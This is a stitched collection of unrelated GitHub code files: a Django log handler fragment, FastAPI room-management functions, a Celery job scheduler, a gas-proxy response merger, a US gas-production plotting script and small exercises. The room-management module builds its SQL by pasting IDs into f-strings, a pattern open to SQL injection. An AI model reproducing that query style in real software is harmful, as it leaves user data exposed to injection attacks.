str(record.exc_info[1]),\n \"stack_trace\": trace,\n }\n LogError.objects.create(**kwargs)\n","repo_name":"null-none/django-log-errors","sub_path":"log_errors/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":2517,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"23271661394","text":"import json\nimport os\nfrom os import getenv\nfrom sqlalchemy.orm import Session\nfrom Database import models\nfrom fastapi import HTTPException, status\nfrom sqlalchemy.sql import text\nfrom datetime import datetime\nimport pytz\nfrom Functions.MemberQuestionsFunctions import deleteSubmittedFile\n\n\ndef createNewRoom(roomName, tokenData, db: Session):\n newRoom = models.Rooms(\n ownerId = tokenData['userId'],\n name = roomName,\n createdAt = datetime.now(pytz.timezone('Asia/Kolkata')),\n specialFields = []\n )\n\n db.add(newRoom)\n db.commit()\n db.refresh(newRoom)\n\n myRooms = getMyRooms(tokenData, db)['myRooms']\n return {\"newRoomId\": newRoom.id, \"myRooms\": myRooms}\n\n\ndef updateRoomSettings(roomInfo, tokenData, db: Session):\n room = db.query(models.Rooms).filter(models.Rooms.id == roomInfo.roomId).first()\n\n if not room:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f\"Room does not exist.\")\n\n if room.ownerId != tokenData['userId']:\n raise HTTPException(status_code=status.HTTP_406_NOT_ACCEPTABLE, detail=f\"You do not own this room.\")\n\n room.name = roomInfo.roomName\n room.visibility = roomInfo.visibility\n room.waitingRoomEnabled = roomInfo.waitingRoomEnabled\n room.specialFields = roomInfo.specialFields\n\n db.commit()\n db.refresh(room)\n\n if not roomInfo.waitingRoomEnabled:\n members = db.execute(text(f\"\"\"\n SELECT id FROM RoomMembers \n WHERE roomId = {roomInfo.roomId} AND inWaitingRoom = TRUE AND isRejected = FALSE \n \"\"\")).fetchall()\n\n\n for member in members:\n db.execute(text(f\"\"\"\n UPDATE RoomMembers\n SET inWaitingRoom = False\n WHERE id = {member[0]}\n \"\"\"))\n db.commit()\n\n\n roomInfo = {\n \"roomId\": room.id,\n \"roomName\": room.name,\n \"visibility\": room.visibility,\n \"waitingRoomEnabled\": room.waitingRoomEnabled,\n \"enrolled\": getEnrolledCount(roomInfo.roomId, db),\n \"waitingRoomCount\": getWaitingRoomCount(roomInfo.roomId, db)\n }\n myRooms = getMyRooms(tokenData, db)['myRooms']\n\n return {\"roomInfo\": roomInfo, \"myRooms\": myRooms}\n\n\ndef getEnrolledCount(roomId, db: Session):\n return db.execute(text(f\"\"\"\n SELECT COUNT(*) \n FROM RoomMembers \n WHERE roomId = {roomId} AND inWaitingRoom = FALSE AND isRejected = FALSE;\n \"\"\")).fetchone()[0]\n\n\ndef getWaitingRoomCount(roomId, db: Session):\n return db.execute(text(f\"\"\"\n SELECT COUNT(*) \n FROM RoomMembers \n WHERE roomId = {roomId} AND inWaitingRoom = TRUE AND isRejected = FALSE;\n \"\"\")).fetchone()[0]\n\n\ndef getMyRooms(tokenData, db: Session):\n sqlData = db.execute(text(f\"\"\"\n SELECT R.id, R.name, R.visibility, COUNT(Q.id) AS questionsCount\n FROM Rooms R\n LEFT JOIN Questions Q on R.id = Q.roomId\n WHERE R.ownerId = {tokenData['userId']}\n GROUP BY R.id\n \"\"\")).fetchall()\n\n myRooms = []\n for row in sqlData:\n # print(row)\n myRooms.append({\n \"roomId\": row[0],\n \"roomName\": row[1],\n \"visibility\": row[2],\n \"questions\": row[3],\n \"enrolled\": getEnrolledCount(row[0], db),\n })\n\n return {\"myRooms\": myRooms}\n\n\ndef getRoomById(roomId, tokenData, db: Session):\n myRoom = db.execute(text(f\"\"\"\n SELECT id, ownerId, name, visibility, waitingRoomEnabled, specialFields\n FROM Rooms\n WHERE id = {roomId}\n \"\"\")).fetchone()\n\n if not myRoom:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f\"Room not found.\")\n\n if tokenData['userId'] != myRoom[1]: #Index 1 is ownerId\n raise HTTPException(status_code=status.HTTP_406_NOT_ACCEPTABLE, detail=f\"You do not own this room.\")\n\n roomInfo = {\n \"roomId\": myRoom[0],\n \"roomName\": myRoom[2],\n \"visibility\": myRoom[3],\n \"waitingRoomEnabled\": myRoom[4] == 1,\n \"enrolled\": getEnrolledCount(roomId, db),\n \"waitingRoomCount\": getWaitingRoomCount(roomId, db),\n \"specialFields\": json.loads(myRoom[5])\n }\n\n questionData = db.execute(text(f\"\"\"\n SELECT id, title, isVisible, endTime, _type\n FROM Questions Q \n WHERE roomId = {roomId}\n \"\"\")).fetchall()\n\n questions = []\n for question in questionData:\n questions.append({\n \"questionId\": question[0],\n \"title\": question[1],\n \"isVisible\": question[2],\n \"endTime\": question[3],\n \"type\": question[4],\n \"submitted\": db.execute(text(f\"\"\"\n SELECT COUNT(DISTINCT userId) \n FROM CodeSubmissions \n WHERE questionId = {question[0]}\n \"\"\")).fetchone()[0]\n +\n db.execute(text(f\"\"\"\n SELECT COUNT(DISTINCT userId) \n FROM FileSubmissions \n WHERE questionId = {question[0]}\n \"\"\")).fetchone()[0]\n })\n\n return {\"roomInfo\": roomInfo, \"questions\": questions}\n\n\ndef verifyRoomOwner(roomId, tokenData, db: Session):\n room = db.query(models.Rooms).filter(models.Rooms.id == roomId).first()\n\n if not room or room.ownerId != tokenData['userId']:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f\"Invalid Room.\")\n\n return room\n\n\ndef getRoomMembers(roomId, waiting, db: Session ):\n\n roomMembers = db.execute(text(f\"\"\"\n SELECT U.id, U.username, U.email, U.fname, U.lname, Rm.id, Rm.specialFields\n FROM RoomMembers RM\n LEFT JOIN Users U on U.id = RM.userId\n WHERE RM.roomId = {roomId} AND RM.isRejected = FALSE AND RM.inWaitingRoom = {waiting}\n GROUP BY U.id\n \"\"\")).fetchall()\n\n members = []\n for member in roomMembers:\n members.append({\n \"userId\": member[0],\n \"userName\": member[1],\n \"email\": member[2],\n \"name\": member[3] + \" \" + member[4],\n \"tableId\": member[5],\n \"specialFields\": json.loads(member[6])\n })\n\n return {\"members\": members}\n\n\ndef modifyRoomMember(roomId, userId, reject, db: Session):\n db.execute(text(f\"\"\"\n UPDATE RoomMembers\n SET isRejected = {reject}, inWaitingRoom = FALSE\n WHERE userId = {userId} AND roomId = {roomId}\n \"\"\"))\n db.commit()\n\n return True\n\n\ndef deleteRoom(roomId, db):\n\n questionIds = db.execute(text(f\"\"\"\n SELECT id, _type FROM Questions WHERE roomId={roomId}\n \"\"\")).fetchall()\n\n for id in questionIds:\n if id[1] == \"file\":\n dir = getenv(\"BASE_PATH\") + f\"/SavedFiles/Q_{id[0]}\"\n for f in os.listdir(dir):\n os.remove(os.path.join(dir, f))\n os.removedirs(dir)\n\n db.execute(text(f\"\"\"\n DELETE FROM FileSubmissions \n WHERE questionId={id[0]}\n \"\"\"))\n else:\n db.execute(text(f\"\"\"\n DELETE FROM CodeSubmissions\n WHERE questionId = {id[0]}\n \"\"\"))\n db.execute(text(f\"\"\"\n DELETE FROM SavedCodes\n WHERE questionId = {id[0]}\n \"\"\"))\n\n db.execute(text(f\"\"\"\n DELETE FROM RoomMembers\n WHERE roomId={roomId}\n \"\"\"))\n db.execute(text(f\"\"\"\n DELETE FROM Questions\n WHERE roomId={roomId}\n \"\"\"))\n db.execute(text(f\"\"\"\n DELETE FROM Rooms\n WHERE id={roomId}\n \"\"\"))\n\n db.commit()\n return True\n","repo_name":"Shlok-Zanwar/CodeRooms-Backend","sub_path":"Functions/MyRoomsFunctions.py","file_name":"MyRoomsFunctions.py","file_ext":"py","file_size_in_byte":7761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6001511693","text":"from typing import Callable\n\n\n# Cheap event emitter\nclass Event(dict):\n async def __call__(self, fname, *args, **kwargs):\n if fname == \"*\":\n await self.call_all(*args, **kwargs)\n else:\n f = self.get(fname)\n if callable(f):\n await f(*args, **kwargs)\n\n async def call_all(self, *args, **kwargs):\n for _, f in self.items():\n if callable(f):\n await f(*args, **kwargs)\n\n def add_method(self, func: Callable):\n name = func.__name__\n self.update({name: func})\n\n def remove_method(self, name: str):\n self.pop(name)\n","repo_name":"dino-inc/ainsleybot","sub_path":"utils/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"30481372421","text":"\ndef findstr(x1,x2):\n i = 0\n k=x1.find(x2)\n while(k!=-1):\n i += 1\n k=x1.find(x2,k+1)\n return i\n\nstr1 = 'i want to improve python,improve python once time im'\nstr2 = 'im'\n\nprint(findstr(str1,str2))\n\n","repo_name":"ljc520313/PythonDemo","sub_path":"com/example/hanshu1.py","file_name":"hanshu1.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"15346977882","text":"# coding=utf-8\r\nfrom seemmo.response.baseProxyResponseHandler import BaseProxyResponseHandler\r\nfrom seemmo.response.responseEntity import ResponseEntity\r\nimport ujson as json\r\nimport logging\r\n\r\n\r\nclass CompareProxyResponseHandler(BaseProxyResponseHandler):\r\n\r\n def __init__(self):\r\n BaseProxyResponseHandler.__init__(self)\r\n self.ignore_error_response = False\r\n\r\n # 1. 如果全部请求都成功,合并结果,返回成功\r\n # 2. 至少有一个请求返回成功,合并结果,返回成功,附带detail\r\n # 2. 所有请求失败(http error或response errorCode!=0),返回失败,附带detail\r\n # 3. http status code 恒返回200\r\n def merge_result(self, response_entity_list):\r\n success_entity_list = list()\r\n failed_entity_list = list()\r\n proxy_detail = dict()\r\n request_body = response_entity_list[0].request_body\r\n\r\n try:\r\n for response_entity in response_entity_list:\r\n proxy_detail[response_entity.request_url] = {'httpCode': response_entity.error_code, 'httpMessage': response_entity.error_message, 'body': response_entity.request_body,\r\n 'return_body': response_entity.return_body}\r\n if response_entity.error_code:\r\n failed_entity_list.append(response_entity)\r\n continue\r\n if not response_entity.return_body:\r\n failed_entity_list.append(response_entity)\r\n continue\r\n body = json.loads(response_entity.return_body)\r\n if ('errorCode' not in body) or cmp(str(body['errorCode']), '0') != 0:\r\n failed_entity_list.append(response_entity)\r\n continue\r\n else:\r\n success_entity_list.append(response_entity)\r\n # 全都失败\r\n if not success_entity_list:\r\n body = {'errorCode': 1, 'message': 'error', 'proxy_detail': proxy_detail}\r\n return ResponseEntity.create_success_entity(None, None, body)\r\n # 至少有部分成功,合并结果\r\n success_body = dict()\r\n if not request_body:\r\n body = {'errorCode': 1, 'message': 'got empty post data', 'proxy_detail': proxy_detail}\r\n return ResponseEntity.create_success_entity(None, None, body)\r\n request_body = json.loads(request_body)\r\n if 'sourceDetail' in request_body:\r\n top_n = request_body['sourceDetail']['topN']\r\n else:\r\n top_n = request_body['sourceFaceDetail']['topN']\r\n for success_entity in success_entity_list:\r\n success_body = self.merge_body(success_body, success_entity.return_body, top_n)\r\n # 没有查询结果\r\n if not success_body:\r\n success_body = json.loads(success_entity_list[0].return_body)\r\n\r\n # 部分成功,返回结果+细节\r\n if failed_entity_list and not self.ignore_error_response:\r\n success_body = self.merge_proxy_detail(success_body, proxy_detail)\r\n return ResponseEntity.create_success_entity(None, None, success_body)\r\n # 全部成功,返回结果\r\n else:\r\n return ResponseEntity.create_success_entity(None, None, success_body)\r\n except Exception as e:\r\n logging.exception('fatal error %s' % e.message)\r\n body = {'errorCode': -99, 'message': e.message, 'proxy_detail': proxy_detail}\r\n return ResponseEntity.create_failed_entity(None, None, -99, e.message, body)\r\n\r\n @staticmethod\r\n def merge_body(result_body, body_tobe_merge, top_n):\r\n body_tobe_merge_dict = json.loads(body_tobe_merge)\r\n if not result_body:\r\n if ('data' not in body_tobe_merge_dict) or ('matchResults' not in body_tobe_merge_dict['data']):\r\n return result_body\r\n if (not body_tobe_merge_dict['data']['matchResults']) or ('topIds' not in body_tobe_merge_dict['data']['matchResults'][0]) or (\r\n not body_tobe_merge_dict['data']['matchResults'][0]['topIds']):\r\n return result_body\r\n result_body = body_tobe_merge_dict\r\n else:\r\n merge_match_results = dict()\r\n # 1. no result to merge\r\n if ('data' not in body_tobe_merge_dict) or ('matchResults' not in body_tobe_merge_dict['data']):\r\n return result_body\r\n if (not body_tobe_merge_dict['data']['matchResults']) or ('topIds' not in body_tobe_merge_dict['data']['matchResults'][0]) or (\r\n not body_tobe_merge_dict['data']['matchResults'][0]['topIds']):\r\n return result_body\r\n # 2. start merge\r\n for matchResults in result_body['data']['matchResults']:\r\n key_id = CompareProxyResponseHandler.get_key_id_in_match_result(matchResults)\r\n merge_match_results[key_id] = matchResults\r\n for matchResults in body_tobe_merge_dict['data']['matchResults']:\r\n key_id = CompareProxyResponseHandler.get_key_id_in_match_result(matchResults)\r\n if key_id in merge_match_results:\r\n merge_match_results[key_id]['topIds'] = merge_match_results[key_id]['topIds'] + matchResults['topIds']\r\n else:\r\n merge_match_results[key_id] = matchResults\r\n\r\n # sort by score\r\n def take_score(arr):\r\n return float(arr['matchingScore'])\r\n\r\n for node in merge_match_results.values():\r\n node['topIds'].sort(key=take_score, reverse=True)\r\n node['topIds'] = node['topIds'][0:top_n]\r\n result_body['data']['matchResults'] = list(merge_match_results.values())\r\n logging.error(json.dumps(result_body))\r\n return result_body\r\n\r\n @staticmethod\r\n def merge_proxy_detail(body, proxy_detail):\r\n body['proxy_detail'] = proxy_detail\r\n return body\r\n\r\n @staticmethod\r\n def get_key_id_in_match_result(match_result):\r\n key_id = 1\r\n if 'compareId' in match_result:\r\n key_id = match_result['compareId']\r\n if 'channelId' in match_result:\r\n key_id = match_result['channelId']\r\n return key_id\r\n","repo_name":"Prymon/simple-url-proxy","sub_path":"seemmo/response/compareProxyResponseHandler.py","file_name":"compareProxyResponseHandler.py","file_ext":"py","file_size_in_byte":6387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"3036375808","text":"from django.db.models import Q\nfrom django.db.models import F\nfrom django.utils import timezone\nimport os\n\nimport celery_tasks\nfrom celery import result\nfrom constants import *\nimport datetime\nfrom image.models import ImageProfile\nfrom image import image_profile\nfrom ignite.settings import MEDIA_ROOT\nimport group\nfrom models import *\nimport pytz\nimport string\nfrom utils.exception import IgniteException\nfrom utils.utils import parse_file\nfrom utils.encrypt import decrypt_data\nimport logging\nlogger = logging.getLogger(__name__)\n\n\ndef get_all_job():\n return Job.objects.all()\n\n\ndef ref_count_delete(job):\n for grp in job.tasks:\n value = -1\n Group.objects.filter(pk=grp[GROUP_ID]).update(ref_count=F('ref_count')+value)\n\n\ndef ref_count_add(grp):\n value = 1\n Group.objects.filter(pk=grp.id).update(ref_count=F('ref_count')+value)\n\n\ndef get_image_details(img):\n image = {}\n image['profile_name'] = img.profile_name\n image['system_image'] = img.system_image\n image['id'] = img.id\n image['image_server_ip'] = img.image_server_ip\n image['image_server_username'] = img.image_server_username\n image['image_server_password'] = img.image_server_password\n image['is_encrypted'] = img.is_encrypted\n image['access_protocol'] = img.access_protocol\n\n return image\n\n\ndef fill_param_values(params):\n parameters = {}\n if len(params):\n\n for param in params:\n if param[PARAM_TYPE] == FIXED:\n parameters[param[PARAM_NAME]] = param[PARAM_VAL]\n\n if param[PARAM_TYPE] == IMAGE_PROFILE:\n img = image_profile.get_profile(param[PARAM_VAL])\n parameters[param[PARAM_NAME]] = get_image_details(img)\n\n if param[PARAM_TYPE] == EVAL:\n try:\n parameters[param[PARAM_NAME]] = eval(param[PARAM_VALUE])\n except SyntaxError:\n raise IgniteException(\"%s = %s\" % (ERR_EVAL_SYNTAX,\n param[PARAM_VALUE]))\n return parameters\n\n\ndef tasks_validation(data, options, job):\n from celery_tasks import get_all_switches\n tsk = []\n if len(data) == 0:\n raise IgniteException(\"Job cannot have empty task sequence\")\n if options == \"update\":\n ref_count_delete(job)\n for task in data:\n try:\n grp = group.get_group(task[GROUP_ID])\n img = image_profile.get_profile(task[IMAGE_ID])\n if options != 'get' and img.system_image == None:\n raise IgniteException(\"No system image is found in the image profile: \" + img.profile_name)\n if options != 'get' and task['type'] == 'epld_upgrade' and img.epld_image == None:\n raise IgniteException(\"No epld image is found in the image profile: \" + img.profile_name)\n if task['type'] in ['epld_upgrade', 'switch_upgrade']:\n if options != 'get' and img.access_protocol != 'scp':\n raise IgniteException(\"Only scp protocol is supported for image profile: \" + img.profile_name)\n task[\"switch_count\"] = len(grp.switch_list)\n # False is to say not to decrypt passwords\n switches = get_all_switches(task, False)\n task['group']['switches'] = switches\n task[IMAGE_NAME] = img.profile_name\n\n if task['type'] != 'custom':\n task['task_params'] = {}\n image = get_image_details(img)\n if task['type'] == 'epld_upgrade':\n image['epld_image'] = img.epld_image\n task['task_params']['image'] = image\n\n if task['type'] == 'custom':\n if task['file_name'] is None and task['function'] is None:\n raise IgniteException(\"Please Provide file/function name Custom task\")\n try:\n task['parameters'] = fill_param_values(task['params'])\n except:\n raise IgniteException(ERR_IN_PARAMS)\n\n tsk.append(task)\n if options != \"get\":\n ref_count_add(grp)\n except Group.DoesNotExist as e:\n raise IgniteException(\"Group id \"+str(task[GROUP_ID])+\" not found\")\n except ImageProfile.DoesNotExist as e:\n raise IgniteException(\"Image id \"+str(task[IMAGE_ID])+\" not found\")\n return tsk\n\n\ndef add_job(data, user):\n tsk = tasks_validation(data[\"tasks\"], \"add\", 0)\n jb = Job()\n jb.name = data[\"name\"]\n date_time = datetime.datetime.strptime(data[\"schedule\"], \"%Y-%m-%dT%H:%M:%S\")\n cur_time = datetime.datetime.utcnow()\n if cur_time >= date_time:\n raise IgniteException(\"schedule time has elapsed\")\n# set timezone information\n date_time = timezone.make_aware(date_time, pytz.timezone('UTC'))\n jb.schedule = date_time\n jb.tasks = data[\"tasks\"]\n jb.updated_by = user\n jb.save()\n# create celery task\n jb.task_id = celery_tasks.run_single_job.apply_async([jb.id, jb.schedule], eta=jb.schedule)\n jb.save()\n jb.tasks = tsk\n return jb\n\n\ndef get_job(id):\n jb = Job.objects.get(pk=id)\n if jb.status in ['SCHEDULED', 'RUNNING']:\n tsk = tasks_validation(jb.tasks, \"get\", 0)\n jb.tasks = tsk\n return jb\n\n\ndef assert_django_job(status, option):\n if not status == 'SCHEDULED':\n if status == 'RUNNING':\n raise IgniteException(\"Job is running\")\n elif option == \"update\":\n raise IgniteException(\"Job is completed\")\n\n\ndef update_job(id, data, user):\n jb = Job.objects.get(pk=id)\n assert_django_job(jb.status, \"update\")\n tsk = tasks_validation(data[\"tasks\"], \"update\", jb)\n jb.name = data[\"name\"]\n date_time = datetime.datetime.strptime(data[\"schedule\"], \"%Y-%m-%dT%H:%M:%S\")\n cur_time = datetime.datetime.utcnow()\n if cur_time >= date_time:\n raise IgniteException(\"Schedule time has elapsed\")\n# set timezone information\n date_time = timezone.make_aware(date_time, pytz.timezone('UTC'))\n res = result.AsyncResult(jb.task_id)\n res.revoke()\n jb.schedule = date_time\n jb.tasks = data[\"tasks\"]\n jb.updated_by = user\n jb.task_id = celery_tasks.run_single_job.apply_async([jb.id, jb.schedule], eta=jb.schedule).task_id\n jb.save()\n jb.tasks = tsk\n return jb\n\n\ndef delete_job(id):\n jb = Job.objects.get(pk=id)\n assert_django_job(jb.status, \"delete\")\n if jb.status == \"SCHEDULED\":\n res = result.AsyncResult(jb.task_id)\n res.revoke()\n ref_count_delete(jb)\n jb.delete()\n\n\ndef get_scripts():\n fNames = os.listdir(os.path.join(MEDIA_ROOT, 'custom'))\n pynames = []\n for name in fNames:\n if name.endswith('.py'):\n pynames.append(name)\n return pynames\n\n\ndef get_clone_task(tasks):\n new_task = []\n\n for task in tasks:\n tsk = {}\n tsk[GROUP_ID] = task[GROUP_ID]\n tsk[IMAGE_ID] = task[IMAGE_ID]\n tsk[IMAGE_NAME] = task[IMAGE_NAME]\n tsk[RETRY_COUNT] = task[RETRY_COUNT]\n tsk[RUN_SIZE] = task[RUN_SIZE]\n tsk[TYPE] = task[TYPE]\n tsk[FAILURE_ACTION_GRP] = task[FAILURE_ACTION_GRP]\n tsk[FAILURE_ACTION_IND] = task[FAILURE_ACTION_IND]\n if task[TYPE] == \"custom\":\n tsk[FILE_NAME] = task[FILE_NAME]\n tsk[FUNCTION] = task[FUNCTION]\n tsk[PARAMS] = task[PARAMS]\n grp = {}\n grp[GROUP_NAME] = task[GROUP][GROUP_NAME]\n grp[USERNAME] = task[GROUP][USERNAME]\n grp[PASSWORD] = task[GROUP][PASSWORD]\n tsk[GROUP] = grp\n new_task.append(tsk)\n return new_task\n\ndef clone_job(data, id, username=''):\n job = Job.objects.get(id=id)\n tasks = get_clone_task(job.tasks)\n\n new_job = Job()\n new_job.name = data[\"name\"]\n date_time = datetime.datetime.strptime(data[\"schedule\"], \"%Y-%m-%dT%H:%M:%S\")\n cur_time = datetime.datetime.utcnow()\n if cur_time >= date_time:\n raise IgniteException(\"schedule time has elapsed\")\n # set timezone information\n date_time = timezone.make_aware(date_time, pytz.timezone('UTC'))\n new_job.schedule = date_time\n new_job.updated_by = username\n tsk = tasks_validation(tasks, \"add\", 0)\n new_job.tasks = tasks\n new_job.save()\n new_job.task_id = celery_tasks.run_single_job.apply_async([new_job.id, new_job.schedule], eta=new_job.schedule)\n new_job.save()\n new_job.tasks = tsk\n return new_job\n","repo_name":"datacenter/ignite-DEPRECATED","sub_path":"group/job.py","file_name":"job.py","file_ext":"py","file_size_in_byte":8384,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"3"} +{"seq_id":"37055057395","text":"from US_Utilities import *\r\n\r\nYear = np.linspace( 1994, 2040, 47)\r\nsum_EIA = np.zeros( len( Year))\r\nsum_HP = np.zeros( len( Year))\r\nsum_HA = np.zeros( len( Year))\r\nsum_WP = np.ones( len( Year)) * 20000\r\nsum_WA = np.ones( len( Year)) * 20000\r\nf1_Barnett = GetFile( \"./Data/US01_Barnett_Gas.csv\", sum_EIA, sum_HP, sum_HA, sum_WP, sum_WA)\r\nf2_Marcellus = GetFile( \"./Data/US02_Marcellus_Gas.csv\", sum_EIA, sum_HP, sum_HA, sum_WP, sum_WA)\r\nf3_Haynesville = GetFile( \"./Data/US03_Haynesville_Gas.csv\", sum_EIA, sum_HP, sum_HA, sum_WP, sum_WA)\r\nf4_EagleFord = GetFile( \"./Data/US04_EagleFord_Gas.csv\", sum_EIA, sum_HP, sum_HA, sum_WP, sum_WA)\r\nf5_Fayetteville = GetFile( \"./Data/US05_Fayetteville_Gas.csv\", sum_EIA, sum_HP, sum_HA, sum_WP, sum_WA)\r\nf6_Woodford = GetFile( \"./Data/US06_Woodford_Gas.csv\", sum_EIA, sum_HP, sum_HA, sum_WP, sum_WA)\r\nf7_Bakken = GetFile( \"./Data/US07_Bakken_Gas.csv\", sum_EIA, sum_HP, sum_HA, sum_WP, sum_WA)\r\nf8_Haynesville = GetFile( \"./Data/US08_Utica_Gas.csv\", sum_EIA, sum_HP, sum_HA, sum_WP, sum_WA, proj_name=\"Yakimov2017\")\r\nf9_Others = GetFile( \"./Data/US09_Others_Gas.csv\", sum_EIA, sum_HP, sum_HA, sum_WP, sum_WA)\r\nfor i in range( 6):\r\n sum_HP[i] += 19.6\r\n sum_HA[i] += 19.6\r\n\r\nPrediction_T = np.linspace( 2017, 2100, 84)\r\nPrediction_Conventional = Hubbert( 2000, 1, .085, 705).GetVector( Prediction_T)\r\nPrediction_TG_Huges = Hubbert( 2016, 1, .07, 428).GetVector( Prediction_T)\r\nPrediction_TG_EIA = Hubbert( 2042, .07, .5, 820).GetVector( Prediction_T)\r\nPrediction_Total_Huges = Prediction_Conventional/1.1 + Prediction_TG_Huges \r\nPrediction_Total_EIA = Prediction_Conventional/1.1 + Prediction_TG_EIA\r\n\r\nEIA_Year, EIA_Withdrawals, EIA_Repress, EIA_VnF, EIA_GW, EIA_OW, EIA_TG, EIA_CBM, EIA_dry, EIA_Marketed = Load_Calibration(\r\n \"./Data/US11_US_Gas_EIA.csv\",\r\n [\"year\", \"gross\", \"repress\", \"vnf\", \"gas_wells\", \"oil_wells\", \"TG_wells\", \"CBM_wells\", \"dry\", \"marketed\"])\r\nmfty2bmy = 0.3048**3/1000\r\nEIA_Withdrawals *= mfty2bmy\r\nEIA_Repress *= mfty2bmy\r\nEIA_VnF *= mfty2bmy\r\nEIA_GW *= mfty2bmy\r\nEIA_OW *= mfty2bmy\r\nEIA_TG *= mfty2bmy\r\nEIA_CBM *= mfty2bmy\r\nEIA_dry *= mfty2bmy\r\nEIA_Marketed *= mfty2bmy\r\nEIA_Extracted = EIA_Withdrawals - EIA_Repress\r\nEIA_Production = EIA_Extracted - EIA_VnF \r\n\r\nfor i in range( len(EIA_CBM)):\r\n if EIA_GW[i] < 0: EIA_GW[i] = 0\r\n if EIA_OW[i] < 0: EIA_OW[i] = 0\r\n if EIA_TG[i] < 0: EIA_TG[i] = 0\r\n if EIA_CBM[i] < 0: EIA_CBM[i] = 0\r\nfor i in range( 36):\r\n EIA_Production[i] = EIA_Marketed[i] \r\n EIA_dry[i] = EIA_Marketed[i] \r\n EIA_Extracted[i] = EIA_Marketed[i] * 1.1\r\n EIA_Withdrawals[i] = EIA_Marketed[i] * 1.1 \r\n \r\nfig = plt.figure( figsize=(15,10))\r\nfig.suptitle( 'Добыча природного газа в США', fontsize=22)\r\ngs = plt.GridSpec(2, 1, height_ratios=[2, 1]) \r\nax1 = plt.subplot(gs[0])\r\nax2 = plt.subplot(gs[1])\r\n\r\nax1.plot( EIA_Year, EIA_Withdrawals, \"-\", lw=1, color='r', label=\"Добыча всего ({:.1f} 10¹² м³)\".format(np.sum(EIA_Withdrawals[:-1])/1000))\r\nax1.plot( EIA_Year[:-1], EIA_Extracted[:-1], \"-\", lw=3, color='r', label=\"Минус закачка ({:.1f} 10¹² м³)\".format(np.sum(EIA_Extracted[:-1])/1000))\r\nax1.plot( EIA_Year[:-1], EIA_Production[:-1], \"-\", lw=2, color='k', label=\"Минус факел ({:.1f} 10¹² м³)\".format(np.sum(EIA_Production[:-1])/1000))\r\nax1.plot( EIA_Year, EIA_dry, \"-\", lw=2, color='b', label=\"Минус НСГ и NGPL ({:.1f} 10¹² м³)\".format(np.sum(EIA_dry[:-1])/1000))\r\nax1.errorbar( Year[:-24], sum_HA[:-24], yerr=sum_HA[:-24]*.05, fmt='o', color=\"k\", label='Газ \"сланцевых\" месторождений')\r\nax1.set_xlim( 1910, 2020)\r\nax1.set_ylim( 0, 1100)\r\nax1.set_ylabel(\"Млрд м³ в год\")\r\nax1.grid(True)\r\nax1.set_title( \"Добыча газа\")\r\nax1.legend(loc=0)\r\n#ax1.annotate(\"Пик добычи в 2018 г\", xy=(2015, 929), xytext=(1970, 1000), arrowprops=dict(facecolor='black', shrink=0.05))\r\n\r\nax2.plot( EIA_Year[67:-1], EIA_GW[67:-1], \"-\", lw=3, color='r', label='\"Классический\" газ')\r\nax2.plot( EIA_Year[67:-1], EIA_OW[67:-1], \"-\", lw=3, color='g', label='Попутный газ')\r\nax2.plot( EIA_Year[67:-1], EIA_CBM[67:-1], \"-\", lw=3, color='k', label='Рудничный газ')\r\nax2.plot( EIA_Year[67:-1], EIA_TG[67:-1], \"-\", lw=3, color='m', label='Трудноизвлекаемый газ')\r\nax2.plot( Year[:-24], sum_HA[:-24], \"--\", lw=1, color='m', label='В том числе \"сланцевых\"')\r\nax2.set_xlim( 1910, 2020)\r\nax2.set_ylim( 0, 600)\r\nax2.set_xlabel(\"Годы\")\r\nax2.set_ylabel(\"Млрд м³ в год\")\r\nax2.grid(True)\r\nax2.set_title( \"Добыча по типу местрождения\")\r\nax2.legend(loc=0)\r\nax2.annotate(\"Пик добычи в 1973 г\", xy=(1973, 550), xytext=(1960, 300), arrowprops=dict(facecolor='black', shrink=0.05))\r\nax2.annotate(\"Падение добычи по 4.8% в год\", xy=(2009, 387), xytext=(1970, 250), arrowprops=dict(facecolor='black', shrink=0.05))\r\n\r\nplt.savefig( \"./Graphs/figure_11_11.png\")\r\nif InteractiveModeOn: plt.show(True)\r\n","repo_name":"myak555/LIMITS_TO_LIMITS","sub_path":"Chapter 11/11_USA_Gas_History.py","file_name":"11_USA_Gas_History.py","file_ext":"py","file_size_in_byte":5055,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"3"} +{"seq_id":"71339482323","text":"soma = 0\nidade_velho = 0\nnome_velho = ''\nmenos_20_anos = 0\n\nfor p in range(1, 5, 1):\n print(f'----- {p}ª PESSOA -----')\n nome = str(input('Nome: ')).strip()\n idade = int(input('Idade: '))\n sexo = str(input('Sexo [M/F]: ')).upper().strip()\n soma += idade\n if sexo == 'F' and idade < 20:\n menos_20_anos += 1\n if sexo == 'M' and idade_velho < idade:\n idade_velho = idade\n nome_velho = nome\n\nmedia = soma / 4\nprint(f'A média de idade do grupo é de {media} anos')\nprint(f'O homem mais velho tem {idade_velho} anos e se chama {nome_velho}.')\nprint(f'Ao todo, são {menos_20_anos} mulheres com menos de 20 anos')\n","repo_name":"josevini/python","sub_path":"Curso de Python/Mundo 2/aula13/ex056.py","file_name":"ex056.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25729651585","text":"#/bin/python3\n\n\n#Numerics\nimport numpy as np\n\n\n\"\"\"\n---------------------------------------------------------------------------------\n| Node function stuff |\n---------------------------------------------------------------------------------\n\"\"\"\n \ndef shape_func(ref_point, node_num : int):\n \"\"\"Returns the value of the specific shape function\n \n Input : xi, eta local coords must be inside a reference triangle with vertices \n (0,0), (1,0), (0,1)\n \n node_num the number of the node as per VTK element 22 numbered 1-6\n \n \"\"\"\n xi, 